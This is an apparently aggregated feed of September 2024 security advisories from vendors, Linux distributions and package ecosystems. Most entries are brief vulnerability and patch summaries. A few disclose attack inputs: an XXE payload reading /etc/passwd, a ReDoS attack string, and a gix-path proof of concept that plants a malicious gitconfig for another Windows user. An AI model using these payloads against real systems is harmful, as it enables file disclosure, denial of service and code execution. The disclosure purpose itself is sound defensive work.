04.09.2024 19:00:00	cisco	[CISCO-SA-ISE-INJECTION-6KN9TSXM] Cisco Identity Services Engine Command Injection Vulnerability (medium)	A vulnerability in specific CLI commands in Cisco Identity Services Engine (ISE) could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have valid Administrator privileges on an affected device.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted CLI command. A successful exploit could allow the attacker to elevate privileges to root.There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-INJECTION-6KN9TSXM
04.09.2024 19:00:00	cisco	[CISCO-SA-CSLU-7GHMZWMW] Cisco Smart Licensing Utility Vulnerabilities (critical)	Multiple vulnerabilities in Cisco Smart Licensing Utility could allow an unauthenticated, remote attacker to collect sensitive information or administer Cisco Smart Licensing Utility services on a system while the software is running.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CSLU-7GHMZWMW
04.09.2024 19:00:00	cisco	[CISCO-SA-EXPRESSWAY-AUTH-KDFRCZ2J] Cisco Expressway Edge Improper Authorization Vulnerability (medium)	A vulnerability in Cisco Expressway Edge (Expressway-E) could allow an authenticated, remote attacker to masquerade as another user on an affected system.This vulnerability is due to inadequate authorization checks for Mobile and Remote Access (MRA) users. An attacker could exploit this vulnerability by running a series of crafted commands. A successful exploit could allow the attacker to intercept calls that are destined for a particular phone number or to make phone calls and have that phone number appear on the caller ID. To successfully exploit this vulnerability, the attacker must be an MRA user on an affected system.There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPRESSWAY-AUTH-KDFRCZ2J
04.09.2024 19:00:00	cisco	[CISCO-SA-DUO-EPIC-INFO-SDLV6H8Y] Cisco Duo Epic for Hyperdrive Information Disclosure Vulnerability (medium)	A vulnerability in Cisco Duo Epic for Hyperdrive could allow an authenticated, local attacker to view sensitive information in cleartext on an affected system.This vulnerability is due to improper storage of an unencrypted registry key. A low-privileged attacker could exploit this vulnerability by viewing or querying the registry key on the affected system. A successful exploit could allow the attacker to view sensitive information in cleartext.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-DUO-EPIC-INFO-SDLV6H8Y
04.09.2024 11:40:06	ubuntu	[USN-6988-1] Twisted vulnerabilities	Several security issues were fixed in Twisted.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6988-1
04.09.2024 05:24:02	fedora	[FEDORA-2024-584e1133e4] Fedora 40: seamonkey	Update to 2.53.19	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-584e1133e4
04.09.2024 05:23:53	fedora	[FEDORA-2024-b40491b84b] Fedora 40: apr (medium)	This update to the apr package fixes a security issue in the handling of sharedmemory permissions. SECURITY: CVE-2023-49582: Apache Portable Runtime (APR): Unexpected lax shared memory permissions (cve.mitre.org) Lax permissions set by the Apache Portable Runtime library on Unix platforms would allow local users read access to named shared memory segments, potentially revealing sensitive application data.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-b40491b84b
04.09.2024 11:28:02	almalinux	[ALSA-2024:6163] python3.9 security update (moderate)	python3.9 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6163
04.09.2024 11:24:23	almalinux	[ALSA-2024:6179] python3.11 security update (moderate)	python3.11 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6179
04.09.2024 12:13:16	almalinux	[ALSA-2024:6184] orc security update (moderate)	orc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6184
04.09.2024 11:22:18	almalinux	[ALSA-2024:6188] runc security update (moderate)	runc security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6188
04.09.2024 11:20:54	almalinux	[ALSA-2024:6192] wget security update (moderate)	wget security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6192
04.09.2024 11:26:08	almalinux	[ALSA-2024:6166] krb5 security update (moderate)	krb5 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6166
04.09.2024 11:23:09	almalinux	[ALSA-2024:6186] containernetworking-plugins security update (moderate)	containernetworking-plugins security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6186
04.09.2024 11:19:33	almalinux	[ALSA-2024:6194] podman security update (important)	podman security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6194
04.09.2024 11:17:53	almalinux	[ALSA-2024:6197] ghostscript security update (moderate)	ghostscript security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6197
06.09.2024 01:22:04	slackware	[SSA:2024-249-01] mozilla-thunderbird	New mozilla-thunderbird packages are available for Slackware 15.0 and -currentto fix security issues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/mozilla-thunderbird-115.15.0-i686-1_slack15.0.txz: Upgraded. This release contains security fixes and improvements. For more information, see: https://www.mozilla.org/en-US/thunderbird/115.15.0esr/releasenotes/ (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.15.0-i686-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.15.0-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-128.2.0esr-i686-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-128.2.0esr-x86_64-1.txzMD5 signaturesSlackware 15.0 package:b6a4d86841b414a630cd29a74c81e23b mozilla-thunderbird-115.15.0-i686-1_slack15.0.txzSlackware x86_64 15.0 package:a566081cd38f2726bb5a91690f4d29b3 mozilla-thunderbird-115.15.0-x86_64-1_slack15.0.txzSlackware -current package:2f88f6bced42ee491104461c50c3597a xap/mozilla-thunderbird-128.2.0esr-i686-1.txzSlackware x86_64 -current package:68685ed6edb44062bacd841ea8263d1a xap/mozilla-thunderbird-128.2.0esr-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg mozilla-thunderbird-115.15.0-i686-1_slack15.0.txz`	https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-249-01
05.09.2024 23:39:48	ubuntu	[USN-6994-1] Netty vulnerabilities	Several security issues were fixed in Netty.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6994-1
05.09.2024 23:33:02	ubuntu	[USN-6991-1] AIOHTTP vulnerability	python-aiohttp would allow unintended access to files over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6991-1
05.09.2024 22:15:13	alpinelinux	[ALPINE:CVE-2024-45158] mbedtls vulnerability	[From CVE-2024-45158] An issue was discovered in Mbed TLS 3.6 before 3.6.1. A stack buffer overflow in mbedtls_ecdsa_der_to_raw() and mbedtls_ecdsa_raw_to_der() can occur when the bits parameter is larger than the largest supported curve. In some configurations with PSA disabled, all values of bits are affected. (This never happens in internal library calls, but can affect applications that call these functions directly.)	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-45158
05.09.2024 22:15:13	alpinelinux	[ALPINE:CVE-2024-45159] mbedtls vulnerability	[From CVE-2024-45159] An issue was discovered in Mbed TLS 3.x before 3.6.1. With TLS 1.3, when a server enables optional authentication of the client, if the client-provided certificate does not have appropriate values in if keyUsage or extKeyUsage extensions, then the return value of mbedtls_ssl_get_verify_result() would incorrectly have the MBEDTLS_X509_BADCERT_KEY_USAGE and MBEDTLS_X509_BADCERT_KEY_USAGE bits clear. As a result, an attacker that had a certificate valid for uses other than TLS client authentication would nonetheless be able to use it for TLS client authentication. Only TLS 1.3 servers were affected, and only with optional authentication (with required authentication, the handshake would be aborted with a fatal alert).	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-45159
05.09.2024 22:15:12	alpinelinux	[ALPINE:CVE-2024-45157] mbedtls vulnerability	[From CVE-2024-45157] An issue was discovered in Mbed TLS before 2.28.9 and 3.x before 3.6.1, in which the user-selected algorithm is not used. Unlike previously documented, enabling MBEDTLS_PSA_HMAC_DRBG_MD_TYPE does not cause the PSA subsystem to use HMAC_DRBG: it uses HMAC_DRBG only when MBEDTLS_PSA_CRYPTO_EXTERNAL_RNG and MBEDTLS_CTR_DRBG_C are disabled.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-45157
05.09.2024 07:07:22	fedora	[FEDORA-2024-8bda3bcaea] Fedora 40: kernel (medium)	The 6.10.7 stable kernel update contains a number of important fixes across thetree.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-8bda3bcaea
05.09.2024 04:54:53	ubuntu	[USN-6993-1] Vim vulnerabilities	Several security issues were fixed in Vim.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6993-1
05.09.2024 03:51:18	ubuntu	[USN-6992-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6992-1
05.09.2024 03:00:00	debian	[DSA-5766-1] chromium (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5766-1
05.09.2024 03:00:00	oraclelinux	[ELSA-2024-6311] resource-agents security update (moderate)	[4.9.0-54.4]- bundled setuptools: fix CVE-2024-6345 Resolves: RHEL-50360[4.9.0-54.3]- gcp-pd-move: fix TLS_VERSION_1 issue Resolves: RHEL-50041[4.9.0-54.2]- bundled urllib3: fix CVE-2024-37891 Resolves: RHEL-44923[4.9.0-54.1]- AWS agents: retry failed metadata requests to avoid instantly failing when there is a hiccup in the network or metadata service- db2: fix OCF_SUCESS typo Resolves: RHEL-34137, RHEL-32828	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6311
05.09.2024 03:00:00	oraclelinux	[ELSA-2024-6422] bubblewrap and flatpak security update (important)	bubblewrap[0.4.0-2]- Backport upstream fix to help address CVE-2024-42472 in flatpakflatpak[1.12.9-3]- Fix previous changelog entry[1.12.9-2]- Backport upstream patches for CVE-2024-42472- Require bubblewrap version that has new --bind-fd option backported for addressing CVE-2024-42472	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6422
05.09.2024 03:00:00	redhat	[RHSA-2024:6422] bubblewrap and flatpak security update (important)	Bubblewrap (/usr/bin/bwrap) is a core execution engine for unprivileged containers that works as a setuid binary on kernels without user namespaces.Security Fix(es):* flatpak: Access to files outside sandbox for apps using persistent= (--persist) (CVE-2024-42472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6422
05.09.2024 09:39:10	almalinux	[ALSA-2024:6309] fence-agents security update (moderate)	fence-agents security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6309
05.09.2024 09:55:28	almalinux	[ALSA-2024:6356] bubblewrap and flatpak security update (important)	bubblewrap and flatpak security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6356
05.09.2024 20:40:19	rustsec	[RUSTSEC-2024-0370] proc-macro-error is unmaintained	proc-macro-error's maintainer seems to be unreachable, with no commits for 2 years, no releases pushed for 4 years, and no activity on the GitLab repo or response to email.proc-macro-error also depends on `syn 1.x`, which may be bringing duplicate dependencies into dependant build trees.## Possible Alternative(s)- [proc-macro-error2](https://crates.io/crates/proc-macro-error2)	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0370
07.09.2024 00:15:12	alpinelinux	[ALPINE:CVE-2024-34156] go vulnerability	[From CVE-2024-34156] Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34156
07.09.2024 00:15:12	alpinelinux	[ALPINE:CVE-2024-34158] go vulnerability	[From CVE-2024-34158] Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34158
07.09.2024 00:15:11	alpinelinux	[ALPINE:CVE-2024-34155] go vulnerability	[From CVE-2024-34155] Calling any of the Parse functions on Go source code which contains deeply nested literals can cause a panic due to stack exhaustion.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-34155
06.09.2024 22:45:29	maven	[MAVEN:GHSA-6CR6-PH3P-F5RF] XXE vulnerability in XSLT transforms in `org.hl7.fhir.core` (high)	### ImpactXSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag ( `<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>` could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML.### PatchesThis issue has been patched in release 6.3.23### WorkaroundsNone.### References[MITRE CWE](https://cwe.mitre.org/data/definitions/611.html)[OWASP XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6CR6-PH3P-F5RF
06.09.2024 07:05:22	fedora	[FEDORA-2024-865828665c] Fedora 40: python-django4.2	urlize and urlizetrunc were subject to a potential denial-of-service attack viavery large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-865828665c
06.09.2024 07:05:22	fedora	[FEDORA-2024-4a08381122] Fedora 40: python-django	urlize and urlizetrunc were subject to a potential denial-of-service attack viavery large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-4a08381122
06.09.2024 07:05:07	fedora	[FEDORA-2024-430678b035] Fedora 40: lua-mpack	Fix buffer overrun when giving an offset to Session:receive	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-430678b035
06.09.2024 07:04:03	fedora	[FEDORA-2024-3d656dafe1] Fedora 40: mingw-python3 (high)	Add patch for CVE-2024-8088.Update to python-3.11.9. Backport fix for CVE-2024-6923.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3d656dafe1
06.09.2024 06:53:47	fedora	[FEDORA-2024-e2bde0853b] Fedora 39: python-django	urlize and urlizetrunc were subject to a potential denial-of-service attack viavery large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e2bde0853b
06.09.2024 06:53:46	fedora	[FEDORA-2024-28892f7c8f] Fedora 39: python-django4.2	urlize and urlizetrunc were subject to a potential denial-of-service attack viavery large inputs with a specific sequence of characters.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-28892f7c8f
06.09.2024 06:53:42	fedora	[FEDORA-2024-a84c59eedc] Fedora 39: lua-mpack	Fix buffer overrun when giving an offset to Session:receive	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-a84c59eedc
06.09.2024 06:53:34	fedora	[FEDORA-2024-992047a33f] Fedora 39: python3.13	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-992047a33f
06.09.2024 06:53:32	fedora	[FEDORA-2024-dab2a69be9] Fedora 39: python3.11	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dab2a69be9
06.09.2024 06:53:31	fedora	[FEDORA-2024-7008b2fedf] Fedora 39: mingw-python3 (high)	Add patch for CVE-2024-8088.Update to python-3.11.9. Backport fix for CVE-2024-6923.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7008b2fedf
06.09.2024 06:53:31	fedora	[FEDORA-2024-dc7f1d57e4] Fedora 39: python3.9	Security fix for CVE-2024-8088	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-dc7f1d57e4
06.09.2024 18:22:53	pypi	[PYSEC-2024-74] mindsdb vulnerability	MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 23.12.4.2, a threat actor can bypass the server-side request forgery protection on the whole website with DNS Rebinding. The vulnerability can also lead to denial of service. Version 23.12.4.2 contains a patch.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-74
06.09.2024 10:42:19	almalinux	[ALSA-2024:6422] bubblewrap and flatpak security update (important)	bubblewrap and flatpak security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:6422
07.09.2024 19:15:02	alpinelinux	[ALPINE:CVE-2023-39333] nodejs, nodejs-current vulnerability	[From CVE-2023-39333] Maliciously crafted export names in an imported WebAssembly module can inject JavaScript code. The injected code may be able to access data and functions that the WebAssembly module itself does not have access to, similar to as if the WebAssembly module was a JavaScript module.This vulnerability affects users of any active release line of Node.js. The vulnerable feature is only available if Node.js is started with the `--experimental-wasm-modules` command line option.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-39333
07.09.2024 19:15:02	alpinelinux	[ALPINE:CVE-2024-36137] nodejs vulnerability (low)	[From CVE-2024-36137] A vulnerability has been identified in Node.js, affecting users of the experimental permission model when the --allow-fs-write flag is used.Node.js Permission Model do not operate on file descriptors, however, operations such as fs.fchown or fs.fchmod can use a "read-only" file descriptor to change the owner and permissions of a file.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-36137
07.09.2024 04:39:44	fedora	[FEDORA-2024-9922206495] Fedora 40: firefox	New upstream update (130.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9922206495
07.09.2024 04:48:33	rustsec	[RUSTSEC-2024-0371] From './.git/config' (Local)	### Summary`gix-path` runs `git` to find the path of a configuration file associated with the `git` installation, but improperly resolves paths containing unusual or non-ASCII characters, in rare cases enabling a local attacker to inject configuration leading to code execution.### DetailsIn `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` to find the path of a file to treat as belonging to the `git` installation.Affected versions of `gix-path` do not pass `-z`/`--null` to cause `git` to report literal paths ([`650a1b5`](https://github.com/Byron/gitoxide/commit/650a1b5cf25e086197cc55a68525a411e1c28031)). Instead, to cover the occasional case that `git` outputs a quoted path, they attempt to parse the path by stripping the quotation marks:<https://github.com/Byron/gitoxide/blob/1cfe577d461293879e91538dbc4bbfe01722e1e8/gix-path/src/env/git/mod.rs#L138-L142>The problem is that, when a path is quoted, it may change in substantial ways beyond the concatenation of quotation marks. If not reversed, these changes can result in another valid path that is not equivalent to the original.This is not limited to paths with unusual characters such as quotation marks or newlines. Unless `git` is explicitly configured with `core.quotePath` set to `false`, it also happens when the path contains most non-ASCII characters, including accented or non-English letters. For example, `é` is transformed to `\303\251`, with literal backslashes. (This is an octal representation of the bytes in its UTF-8 encoding. This behavior is not limited to systems that encode paths with UTF-8 on disk.)Rarely, the configuration file `gix-path` wrongly attempts to open can be created by an attacker who has a limited user account on the system. The attacker would often need to request an account username tailored to carrying out the attack.### PoC#### Quick demonstration on UnixOn a Unix-like system in which Git supports no higher scope than `system` for configuration variables (i.e., not on macOS with Apple Git), in a locale that supports UTF-8, with `gitoxide` installed, run:```shmkdir myrepocd myrepogit initprintf '[real]\n\trealvar = realval\n' > 'é'printf '[fake]\n\tfakevar = fakeval\n' > '\303\251'GIT_CONFIG_SYSTEM='é' gix config```If the above conditions are satisfied and the `gix` command was built against an affected version of `gix-path`, then the last command's output looks something like this:```text# From '\303\251' (GitInstallation)[fake] fakevar = fakeval# From 'é' (System)[real] realvar = realval# From '/home/ubuntu/.gitconfig' (User)[init] defaultBranch = main# From './.git/config' (Local)[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true```#### Demonstration across user accounts on WindowsOn a test system running Windows on which Git for Windows is not installed system-wide—resembling a scenario in which users who wish to use Git are expected to install it themselves for their accounts—create two accounts, with these usernames:- Renée, the target of the attack. This user may be a limited user or an administrator. Its user profile directory is assumed to be `C:\Users\Renée`.- Ren, the user who carries out the attack. This user should be a limited user, since an administrator would not need to exploit this vulnerability to inject configuration. Its user profile directory is assumed to be `C:\Users\Ren`.As Ren, run these commands in PowerShell:```powershell$d = "$HOME\303\251e\AppData\Local\Programs\Git\etc"mkdir $dgit config --file $d\gitconfig core.sshCommand calc.exeicacls $HOME\303 /grant 'Renée:(RX)' /T```(The `gitconfig` file can instead be written manually, in which case Ren need not have `git`.)As Renée:1. Install Git for Windows in the default location for non-systemwide installations, which for that user account is inside `C:\Users\Renée\AppData\Local\Programs`. For a non-administrative installation, Git for Windows will pick this location automatically. Allow the installer to place the directory containing `git` in the user's `PATH`, as it does by default. (The scenario can be modified for any location the attacker can predict. So, for example, Renée can install Git for Windows with [`scoop`](https://scoop.sh/), and Ren could carry out the attack with correspondingly modified path components in place of `AppData\Local\Programs\Git`.)2. Install `gitoxide` using any common technique, such as by [installing Rust](https://www.rust-lang.org/tools/install) and then running `cargo install gitoxide`.3. Open a PowerShell window and run a `gix` command that attempts to run the SSH client for transport. For example: ```pwsh gix clone ssh://localhost/myrepo.git ``` At least one, and usually two, instances of the Windows calculator will pop up. This happens because `calc.exe` was configured in the fake configuration file the user Ren was able to cause to be used, by placing it at the location `gix-path` wrongly resolved the path of Renée's own configuration file to.The `gitconfig` file written by the attacker can be adjusted with an arbitrary choice of payload, or to set other configuration variables.### ImpactOn a single-user system, it is not possible to exploit this, unless `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` have been set to unusual values or Git has been installed in an unusual way. Such a scenario is not expected.Exploitation is unlikely even on a multi-user system, though it is plausible in some uncommon configurations or use cases. It is especially unlikely with Apple Git on macOS, due to its very high scoped configuration in `/Library` or `/Applications` that would be detected instead, as in [CVE-2024-45305](https://github.com/advisories/GHSA-v26r-4c9c-h3j6).The likelihood of exploitation may be higher on Windows, where attacks such as those shown in the Windows proof-of-concept above can be performed due to the status of `\` as a directory separator, and where there is no restriction on usernames containing accented or non-English letters (though the latter is also permitted on some other systems). Even then, complex user interaction is required. In most cases, a system administrator would have to approve an innocuous-seeming username, and then the targeted user (who could be the same or a different user) would have to use an application that uses `gix-path`.In general, exploitation is more likely to succeed if at least one of the following applies:- Users are expected to install `git` themselves, and are likely to do so in predictable locations.- Locations where `git` is installed, whether due to usernames in their paths or otherwise, contain characters that `git` quotes by default in paths, such as non-English letters and accented letters.- A custom `system`-scope configuration file is specified with the `GIT_CONFIG_SYSTEM` environment variable, and its path is in an unusual location or has strangely named components.- A `system`-scope configuration file is absent, empty, or suppressed by means other than `GIT_CONFIG_NOSYSTEM`. Currently, `gix-path` can treat a `global`-scope configuration file as belonging to the installation if no higher scope configuration file is available. This increases the likelihood of exploitation even on a system where `git` is installed system-wide in an ordinary way.However, exploitation is expected to be very difficult even under any combination of those factors.Although the effect here is similar to [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2) once exploited, a greater degree of user interaction would usually be required, and the attack complexity here is much higher because the necessary conditions are uncommon and challenging to predict.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0371
07.09.2024 21:23:36	rustsec	[RUSTSEC-2024-0372] Memory leak when calling a canister method via `ic_cdk::call`	When a canister method is called via `ic_cdk::call`, a new Future `CallFuture` is created and can be awaited by the caller to get the execution result. Internally, the state of the Future is tracked and stored in a struct called `CallFutureState`. A bug in the polling implementation of the `CallFuture` allows multiple references to be held for this internal state and not all references were dropped before the `Future` is resolved. Since we have unaccounted references held, a copy of the internal state ended up being persisted in the canister's heap and thus causing a memory leak. ### ImpactCanisters built in Rust with `ic_cdk` and `ic_cdk_timers` are affected. If these canisters call a canister method, use timers or heartbeat, they will likely leak a small amount of memory on every such operation. In the worst case, this could lead to heap memory exhaustion triggered by an attacker.*Motoko based canisters are not affected by the bug.### PatchesThe patch has been backported to all minor versions between `>= 0.8.0, <= 0.15.0`. The patched versions available are `0.8.2, 0.9.3, 0.10.1, 0.11.6, 0.12.2, 0.13.5, 0.14.1, 0.15.1` and their previous versions have been yanked. ### WorkaroundsThere are no known workarounds at the moment. Developers are recommended to upgrade their canister as soon as possible to the latest available patched version of `ic_cdk` to avoid running out of Wasm heap memory. > Upgrading the canisters (without updating `ic_cdk`) also frees the leaked memory but it's only a temporary solution.### Referencesas- [dfinity/cdk-rs/pull/509](https://github.com/dfinity/cdk-rs/pull/509)- [ic_cdk docs](https://docs.rs/ic-cdk/latest/ic_cdk/)- [Internet Computer Specification](https://internetcomputer.org/docs/current/references/ic-interface-spec)	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0372
08.09.2024 03:00:00	debian	[DSA-5767-1] thunderbird (critical)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5767-1
10.09.2024 01:34:12	maven	[MAVEN:GHSA-57RH-GR4V-J5F6] Keycloak Uses a Key Past its Expiration Date (moderate)	A vulnerability was found in Keycloak. Expired OTP codes are still usable when using FreeOTP when the OTP token period is set to 30 seconds (default). Instead of expiring and deemed unusable around 30 seconds in, the tokens are valid for an additional 30 seconds totaling 1 minute.A one time passcode that is valid longer than its expiration time increases the attack window for malicious actors to abuse the system and compromise accounts. Additionally, it increases the attack surface because at any given time, two OTPs are valid.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-57RH-GR4V-J5F6
10.09.2024 01:33:52	maven	[MAVEN:GHSA-J76J-RQWJ-JMVV] Keycloak Session Fixation vulnerability (high)	A session fixation issue was discovered in the SAML adapters provided by Keycloak. The session ID and JSESSIONID cookie are not changed at login time, even when `the turnOffChangeSessionIdOnLogin` option is configured. This flaw allows an attacker who hijacks the current session before authentication to trigger session fixation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J76J-RQWJ-JMVV
10.09.2024 01:34:52	maven	[MAVEN:GHSA-G4GC-RH26-M3P5] Keycloak Open Redirect vulnerability (moderate)	An open redirect vulnerability was found in Keycloak. A specially crafted URL can be constructed where the `referrer` and `referrer_uri` parameters are made to trick a user to visit a malicious webpage. A trusted URL can trick users and automation into believing that the URL is safe, when, in fact, it redirects to a malicious server. This issue can result in a victim inadvertently trusting the destination of the redirect, potentially leading to a successful phishing attack or other types of attacks.Once a crafted URL is made, it can be sent to a Keycloak admin via email for example. This will trigger this vulnerability when the user visits the page and clicks the link. A malicious actor can use this to target users they know are Keycloak admins for further attacks. It may also be possible to bypass other domain-related security checks, such as supplying this as a OAuth redirect uri. The malicious actor can further obfuscate the `redirect_uri` using URL encoding, to hide the text of the actual malicious website domain.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G4GC-RH26-M3P5
10.09.2024 17:52:46	npm	[NPM:GHSA-9WV6-86V2-598J] path-to-regexp outputs backtracking regular expressions (high)	### ImpactA bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (`.`). For example, `/:a-:b`.### PatchesFor users of 0.1, upgrade to `0.1.10`. All other users should upgrade to `8.0.0`. Version 0.1.10 adds backtracking protection when a custom regular expression is not provided, so it's still possible to manually create a ReDoS vulnerability if you are providing custom regular expressions.Version 8.0.0 removes all features that can cause a ReDoS and stops exposing the regular expression directly.### WorkaroundsAll versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change `/:a-:b` to `/:a-:b([^-/]+)`.If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string improves performance by 4x faster.### DetailsUsing `/:a-:b` will produce the regular expression `/^\/([^\/]+?)-([^\/]+?)\/?$/`. This can be exploited by a path such as `/a${'-a'.repeat(8_000)}/a`. [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) has a good example of why this occurs, but the TL;DR is the `/a` at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the `:a-:b` on the repeated 8,000 `-a`.Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.### References* [OWASP](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)* [Detailed blog post](https://blakeembrey.com/posts/2024-09-web-redos/)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9WV6-86V2-598J
